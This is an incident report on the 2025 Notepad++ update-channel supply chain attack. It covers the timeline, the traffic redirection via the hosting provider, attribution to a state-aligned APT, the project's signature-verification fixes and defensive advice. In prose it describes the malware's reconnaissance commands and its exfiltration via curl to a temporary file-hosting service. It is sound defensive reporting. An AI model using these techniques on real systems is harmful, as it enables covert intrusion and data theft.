In 2025, the popular text editor Notepad++ became the target of a sophisticated software supply chain attack. Attackers did not breach the application’s source code. Instead, they compromised the infrastructure of a former hosting provider for notepad-plus-plus.org and abused the update delivery mechanism to distribute malicious installers to selected users. On 2 February 2026, Notepad++ developer Don Ho publicly confirmed the scope and nature of this incident following an internal investigation.
How the Notepad++ supply chain attack unfolded
According to the published findings, malicious activity began around June 2025 and remained undetected until December. The attackers focused on the update channel rather than the Notepad++ codebase itself, demonstrating a classic software supply chain compromise: instead of attacking the product directly, they exploited its surrounding infrastructure.
The threat actors intercepted HTTP requests from the built-in updater and selectively redirected some of this traffic to attacker-controlled servers. There, victims were served forged update manifests that pointed to trojanized Notepad++ installers. Because the substitution affected only a subset of users, the operation generated minimal noise and significantly delayed detection.
The malware delivered via these fake updates performed limited but precise initial reconnaissance. On infected Windows systems it executed standard commands such as netstat, systeminfo, tasklist and whoami to collect network details, OS configuration, running processes and the current user context. The results were stored in a file and exfiltrated via curl to the temporary file-hosting service temp[.]sh. This lightweight toolset is typical for the first stage of targeted intrusions, allowing attackers to assess the strategic value of compromised machines before deploying additional payloads.
Compromised hosting infrastructure and timeline of the attack
The former hosting provider reported that the server hosting the Notepad++ update mechanism had been compromised before 2 September 2025. On that date, the provider performed scheduled maintenance, including kernel and firmware updates. After this intervention, suspicious direct access patterns to the server disappeared from the logs, suggesting that the attackers lost their initial foothold on the machine itself.
However, the incident report indicates that the adversaries maintained access to internal hosting infrastructure services until 2 December 2025. This residual access was sufficient to continue selective redirection of requests to /update/getDownloadUrl.php towards their own servers, injecting malicious URLs into the update process. Log data showed no evidence of similar activity against other customers on the same platform, underscoring that notepad-plus-plus.org and its update endpoint were the primary targets.
Incident response specialists estimate that the practical exploitation phase likely ended around 10 November 2025, although some dates in the provider’s and developer’s records do not fully align. The investigation therefore treats the period between June and December 2025 as the overall window of infrastructure compromise.
Possible link to Chinese state-sponsored APT actors
Several independent cybersecurity experts have assessed with high confidence that the operation is consistent with the activity of a Chinese state-aligned Advanced Persistent Threat (APT). The attribution is based on multiple factors: the highly targeted nature of the campaign, the low operational noise achieved by tampering with only a portion of updates, and the profile of affected organizations, some of which reportedly maintain business interests in East Asia.
Strategic supply chain operations of this type align with known tactics of government-backed APT groups, which frequently leverage trusted software updates to gain covert, long-term access to selected networks. Previous high-impact cases, such as the SolarWinds Orion compromise and the CCleaner incident, have shown that abusing software distribution channels can bypass traditional perimeter defenses and endpoint controls. Public threat landscape reports from agencies such as ENISA and CISA consistently rank supply chain attacks among the most difficult-to-detect intrusion vectors because users inherently trust updates from well-known vendors.
Notepad++ security response and hardening of the update mechanism
After receiving the first user reports of suspicious updates in late 2025, the Notepad++ team moved quickly to reinforce its update infrastructure. In November 2025, version Notepad++ 8.8.8 was released, changing the update download source to GitHub exclusively. This reduced the attack surface on the hosting provider’s side and ensured updates were fetched from a more tightly controlled distribution platform.
On 9 December 2025, version 8.8.9 introduced stricter integrity and authenticity checks. The integrated updater component WinGup began validating both the digital signature of the installer and the publisher certificate. In parallel, the update server started signing its XML responses using XMLDSig (XML Digital Signatures). This step ensures that not only the executable, but also the metadata that directs the update process, is protected against tampering.
The Notepad++ website was migrated to a new hosting provider with enhanced security controls and revised operational procedures. A further release, version 8.9.2, is expected to make signature and certificate verification mandatory and non-bypassable for all updates. Until then, the project maintainer recommends that users manually download and install version 8.9.1, which already incorporates the critical security improvements.
Key cybersecurity lessons for software update security
The Notepad++ incident highlights that even widely trusted and widely used tools can be turned into an attack vector when supporting infrastructure is compromised. For both organizations and individual users, the software update mechanism must be treated as a critical security component, not just a convenience feature.
To reduce exposure to similar threats, security practitioners recommend enabling and enforcing digital signature verification for updates wherever possible, and carefully managing automatic updates on high-value or mission-critical systems. Outbound traffic should be monitored for unexpected destinations, especially temporary file-sharing platforms or previously unseen domains, which are often used for discreet data exfiltration. It is also essential to track advisories and incident reports related to the software in use, so that known compromise periods can be correlated with internal logs.
On the vendor side, the case underlines the need for robust supplier and hosting security, including regular security audits, comprehensive logging, strict access controls to internal management systems and well-tested incident response processes. As global experience with SolarWinds, CCleaner and now Notepad++ shows, supply chain resilience is a shared responsibility across developers, service providers and end users. The more rigorously organizations authenticate updates and monitor for anomalous network behavior, the harder it becomes for attackers to execute silent, targeted supply chain operations at scale.
